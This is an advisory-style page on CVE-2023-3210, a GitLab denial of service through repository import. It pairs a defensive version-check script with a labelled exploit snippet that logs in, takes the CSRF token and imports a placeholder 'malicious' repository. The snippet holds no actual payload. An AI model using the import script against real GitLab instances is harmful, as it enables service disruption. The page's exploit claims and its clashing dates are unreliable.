A critical vulnerability, identified as CVE-2023-3210, has been discovered in the widely used repository management tool GitLab. This issue affects a broad range of GitLab versions (the patched releases are listed below) and can be exploited by authenticated users. The vulnerability can cause a Denial of Service (DoS) when importing or cloning malicious content.

Exploit Details

Authenticated users with access to the import and cloning functionality can exploit this vulnerability by introducing malicious content into the system. When that content is imported or cloned, it can trigger a DoS condition, impacting the stability and availability of the GitLab instance for all users.

To remediate this issue, it is highly recommended that users update their GitLab instances to the latest patched versions (16.1.5, 16.2.5, or 16.3.1, as appropriate).
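To turn the patched releases above into a quick check, the following helper (an added example, not code from the advisory or from GitLab) compares the version reported by an instance against 16.1.5, 16.2.5 and 16.3.1. GitLab exposes its version through GET /api/v4/version as a JSON object with "version" and "revision" fields; the sample responses below are constructed. Two points are my assumptions and not stated on the page: that every release in the 16.1, 16.2 and 16.3 series below the named fix is unpatched and every older series is unpatched, and that any series newer than 16.3 carries the fix.

```python
import json
import re

# Patched releases named in the advisory, keyed by their minor series.
PATCHED = {
    (16, 1): (16, 1, 5),
    (16, 2): (16, 2, 5),
    (16, 3): (16, 3, 1),
}


def parse_version(text):
    """Parse a GitLab version string such as '16.2.4' or '16.3.1-ee' into a tuple."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_patched(version):
    """Return True if the given version carries the fix for this advisory.

    Assumption (not stated on the page): releases older than the 16.1 series
    are treated as unpatched, and any series newer than 16.3 as patched.
    """
    v = parse_version(version)
    series = v[:2]
    if series in PATCHED:
        return v >= PATCHED[series]
    return series > max(PATCHED)


def check_version_response(body):
    """Evaluate the JSON body returned by GET /api/v4/version."""
    data = json.loads(body)
    version = data["version"]
    return {"version": version, "patched": is_patched(version)}


# Constructed sample responses in the shape the /api/v4/version endpoint returns.
SAMPLES = [
    '{"version": "16.2.4-ee", "revision": "abc123"}',
    '{"version": "16.2.5-ee", "revision": "def456"}',
    '{"version": "16.3.1", "revision": "0123"}',
    '{"version": "15.11.8", "revision": "9999"}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        result = check_version_response(body)
        status = "patched" if result["patched"] else "NEEDS UPDATE"
        print(f"{result['version']:>12}  {status}")
```

In practice the body passed to check_version_response would come from an authenticated request to the instance's /api/v4/version endpoint; the function deliberately takes the raw body so it can be run offline against captured responses.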

Code Snippet

The code snippet below demonstrates how an authenticated user could potentially exploit this vulnerability by using a malicious payload to trigger a DoS condition:

import requests
from lxml import html

# Placeholders: fill in the instance URL, credentials and the repository to import
GITLAB_URL = "https://gitlab.example.com"
GITLAB_USERNAME = "username"
GITLAB_PASSWORD = "password"
MALICIOUS_REPO_URL = "https://example.invalid/malicious.git"

session_payload = {
    "username": GITLAB_USERNAME,
    "password": GITLAB_PASSWORD
}

# Fetch the sign-in form and extract the CSRF (authenticity) token
login_url = f"{GITLAB_URL}/users/sign_in"
session_request = requests.Session()
response = session_request.get(login_url)
tree = html.fromstring(response.text)
auth_token = tree.xpath("//input[@name='authenticity_token']/@value")[0]
session_payload["authenticity_token"] = auth_token
session_request.post(login_url, data=session_payload, headers=dict(referer=login_url))

# Create a project whose contents are imported from the attacker-controlled URL
malicious_payload = {
    "import_url": MALICIOUS_REPO_URL,
    "authenticity_token": auth_token,
    "project[name]": "malicious_repo",
    "project[namespace_id]": "1"
}

new_project_url = f"{GITLAB_URL}/projects"
session_request.post(new_project_url, data=malicious_payload, headers=dict(referer=new_project_url))

For more information, please refer to the following sources:

1. GitLab Security Advisory: https://about.gitlab.com/releases/2023/09/28/CVE-2023-3210-gitlab-import-repository.html
2. CVE-2023-3210: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3210
3. NVD - CVE-2023-3210: https://nvd.nist.gov/vuln/detail/CVE-2023-3210

Conclusion

Given the widespread use of GitLab in the software development community, it is paramount that administrators update their GitLab instances to the latest patched versions. Failing to do so leaves the system open to DoS attacks by authenticated users who import or clone malicious content. Keeping software up to date remains the baseline practice for preserving the security and availability of critical systems.

Timeline

Published on: 09/01/2023 11:15:00 UTC
Last modified on: 09/01/2023 21:13:00 UTC